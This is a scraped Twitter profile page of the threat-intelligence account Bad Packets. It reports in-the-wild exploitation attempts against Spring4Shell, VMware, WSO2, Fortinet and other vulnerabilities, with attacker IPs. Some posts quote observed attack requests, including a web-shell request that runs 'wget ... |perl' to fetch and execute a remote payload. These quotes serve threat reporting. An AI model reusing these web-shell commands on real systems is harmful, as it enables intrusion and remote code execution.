Bad PacketsVerifierat konto

@bad_packets

Tweets by Troy Mursch. We provide cyber #threatintel on emerging threats, DDoS botnets, and network abuse. References: http://badpackets.net/references/

Chicago, IL

badpackets.net

4 105 Foton och videor Foton och videor

Tweets

Tweets, aktuell sida.
Tweets & svar
Media

Du blockerade @bad_packets

Är du säker på att du vill visa dessa Tweets? Visning av Tweets kommer inte att häva blockeringen av @bad_packets

Fastnålad Tweet
Bad Packets‏Verifierat konto @bad_packets 10 dec. 2021
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (https://github.com/advisories/GHSA-jfh8-c2jp-5v3q …). Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel

8 svar 233 retweets 494 gillanden

Visa denna tråd

Visa denna tråd
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets för 17 timmar sedan
CVE-2022-29464 event detected Source IP: 179.43.156.214 () Target: WSO2 API Manager and Identity Server endpoints vulnerable to unrestricted arbitrary file upload leading to remote code execution. Vendor advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738 … #threatintelpic.twitter.com/tXzbUw8xnI

5 retweets 7 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 27 apr.
CVE-2022-22954 event detected Source IP: 212.193.30.228 () Target: VMware Workspace ONE Access and Identity Manager servers vulnerable to remote code execution (https://vmware.com/security/advisories/VMSA-2022-0011.html …). #threatintel

7 retweets 20 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 25 apr.
Top 10 Countries – Apr. 24, 2022 Active unique DDoS botnet hosts detected: China: 1,018 United States: 535 South Korea: 438 Taiwan: 372 Brazil: 274 Russia: 219 India: 192 Mexico: 143 Italy: 115 Japan: 105 #threatintel

16 retweets 26 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 23 apr.
CVE-2022-29464 event detected Source IP: 37.19.221.142 () Target: WSO2 API Manager and Identity Server endpoints vulnerable to unrestricted arbitrary file upload leading to remote code execution. Vendor advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738 … #threatintelpic.twitter.com/gv0sOMhDkT

1 svara 27 retweets 58 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 20 apr.
Mass scanning activity detected from 45.134.144.140 () targeting Fortinet VPN servers vulnerable to unauthenticated arbitrary file read (CVE-2018-13379) leading to disclosure of usernames and passwords in plaintext. First seen: 2022-02-26 Last seen: 2022-04-20 #threatintel

13 retweets 17 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 15 apr.
Bad Packets Retweetade GitHub Security

"GitHub is currently working to identify and notify all of the known-affected victim users and organizations."https://twitter.com/GitHubSecurity/status/1515101093419646976 …

Bad Packets lade till

GitHub Security @GitHubSecurity

GitHub has uncovered evidence that an attacker abused stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI. Read more about the impact to GitHub, npm, and our users. https://github.blog/2022-04-15-security-alert-stolen-oauth-user-tokens/ …

Visa denna tråd

2 svar 66 retweets 103 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 14 apr.
CVE-2022-22954 event detected Source IP: 185.244.153.13 () Target: VMware Workspace ONE Access and Identity Manager servers vulnerable to remote code execution. Vendor advisory: https://vmware.com/security/advisories/VMSA-2022-0011.html … #threatintelpic.twitter.com/gfKTnPdvsU

17 retweets 27 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets Retweetade
BleepingComputer‏Verifierat konto @BleepinComputer 13 apr.
Hackers exploiting VMware servers with public RCE exploit - @billtoulashttps://www.bleepingcomputer.com/news/security/hackers-exploiting-vmware-servers-with-public-rce-exploit/ …

3 svar 118 retweets 200 gillanden

Visa denna tråd

Visa denna tråd
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 13 apr.
CVE-2022-22954 event detected Source IP: 178.176.202.121 () Target: VMware Workspace ONE Access and Identity Manager servers vulnerable to remote code execution (https://vmware.com/security/advisories/VMSA-2022-0011.html …). #threatintelpic.twitter.com/vcio3i6F3h

1 svara 31 retweets 69 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 13 apr.
Bad Packets Retweetade Bad Packets

We're also seeing CVE-2022-22954 activity from 60.166.67.164 () – tags available now.https://twitter.com/bad_packets/status/1513937078232371200 …

Bad Packets lade till

Bad PacketsVerifierat konto @bad_packets

CVE-2022-22954 event detected Source IP: 117.89.211.135 () Target: VMware Workspace ONE Access (VMware Identity Manager) servers vulnerable to remote code execution Vendor advisory: https://www.vmware.com/security/advisories/VMSA-2022-0011.html … #threatintel

1 svara 4 retweets 9 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 12 apr.
CVE-2022-22954 event detected Source IP: 117.89.211.135 () Target: VMware Workspace ONE Access (VMware Identity Manager) servers vulnerable to remote code execution Vendor advisory: https://www.vmware.com/security/advisories/VMSA-2022-0011.html … #threatintel

1 svara 14 retweets 22 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 9 apr.
CVE-2022-22965 event detected Source IP: 120.230.0.66 () Paths targeted: / /add /download /index /login /uploadFile #Spring4Shellpic.twitter.com/DbHGdcRPzZ

1 svara 25 retweets 53 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 6 apr.
CVE-2022-22965 event detected from 185.244.152.15 () with follow-up GET request for "/1877team.jsp?pwd=j&cmd=whoami" #Spring4Shellpic.twitter.com/kQqnfNHgF1

31 retweets 70 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 5 apr.
CVE-2022-22965 event detected from 45.12.2.252 () with follow-up GET request for "/checkexploit.jsp" #Spring4Shellpic.twitter.com/UHWRKzTy90

4 retweets 12 gillanden

Visa denna tråd

Visa denna tråd
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 2 apr.
CVE-2022-22965 event detected from 144.16.111.28 () with follow-up GET request for "/shell.jsp?pwd=k3rwin&cmd=wget -q -O - 89.44.9.246/i|perl" #Spring4Shellpic.twitter.com/Z6fBJmGugN

1 svara 13 retweets 30 gillanden

Visa denna tråd

Visa denna tråd
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 2 apr.
CVE-2022-22963 event detected from 45.33.65.249 () – "touch /tmp/test.txt"pic.twitter.com/QCYkrwLGpY

1 svara 5 retweets 19 gillanden

Visa denna tråd

Visa denna tråd
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 1 apr.
CVE-2022-22965 event detected from 192.3.145.46 () with follow-up GET request for "alala.txt" #Spring4Shellpic.twitter.com/HF3dH51yXB

1 svara 11 retweets 30 gillanden

Visa denna tråd

Visa denna tråd
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 31 mars
Spring Cloud Function RCE (CVE-2022-22963) mass scanning activity detected from 45.155.204.146 (). Spring Framework RCE (CVE-2022-22965) mass scanning activity detected from multiple Tor exit nodes. Tags available now for both vulnerabilities.

3 svar 55 retweets 116 gillanden

Visa denna tråd

Visa denna tråd
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 30 mars
Ubiquiti Inc. v. Brian Krebshttps://www.courtlistener.com/docket/63197557/1/ubiquiti-inc-v-krebs/ …

1 svara 21 retweets 42 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra
Bad Packets‏Verifierat konto @bad_packets 25 mars
CVE-2021-26084 event detected Source IP: 109.237.96.124 () Target: Atlassian Confluence servers vulnerable to unauthenticated remote code execution (https://jira.atlassian.com/browse/CONFSERVER-67940 …). #threatintelpic.twitter.com/zNsAbt6J6B

3 svar 103 retweets 288 gillanden
Tack. Twitter använder detta för att förbättra din tidslinje. Ångra

Ångra

Hämtningen verkar ta ett tag

Twitter kan vara överbelastat eller ha tillfälliga problem. Försök igen eller besök Twitter Status om du vill ha mer information.

Land	Kod	För kunder hos
USA	40404	(vilken som helst)
Kanada	21212	(vilken som helst)
Storbritannien	86444	Vodafone, Orange, 3, O2
Brasilien	40404	Nextel, TIM
Haiti	40404	Digicel, Voila
Irland	51210	Vodafone, O2
Indien	53000	Bharti Airtel, Videocon, Reliance
Indonesien	89887	AXIS, 3, Telkomsel, Indosat, XL Axiata
Italien	4880804	Wind
Italien	3424486444	Vodafone
» Se SMS-kortnummer för andra länder

Bad PacketsVerifierat konto

@bad_packets

Tweets

Du blockerade @bad_packets

Hämtningen verkar ta ett tag

Du kanske också gillar

false

Sparade sökningar

Bad PacketsVerifierat konto

@bad_packets

Tweets

Du blockerade @bad_packets

Bad Packets följde

Hämtningen verkar ta ett tag

Ny på Twitter?

Du kanske också gillar

false

Välj en plats för trender

Gå till en användares profil.

Sparade sökningar

Sponsra denna Tweet

Blockera

Tweeta med en position

Dina listor

Skapa en ny lista

Kopiera länk till Tweet

Bädda in denna Tweet

Embed this Video

Förhandsgranskning

Varför du ser denna annons

Logga in på Twitter

Registrera dig på Twitter

Har du inte Twitter? Registrera dig, ta del av de saker du bryr dig om och få omedelbara uppdateringar i realtid.

Tvåvägskoder för att sända och ta emot

Bekräftelse

Välkommen hem!

Fungerar inga Tweets för dig?

Säg mycket med små medel

Sprid ordet

Delta i konversationen

Ta reda på mer om senaste nytt

Få mer av det du gillar

Ta reda på vad som händer

Missa inte ett enda ögonblick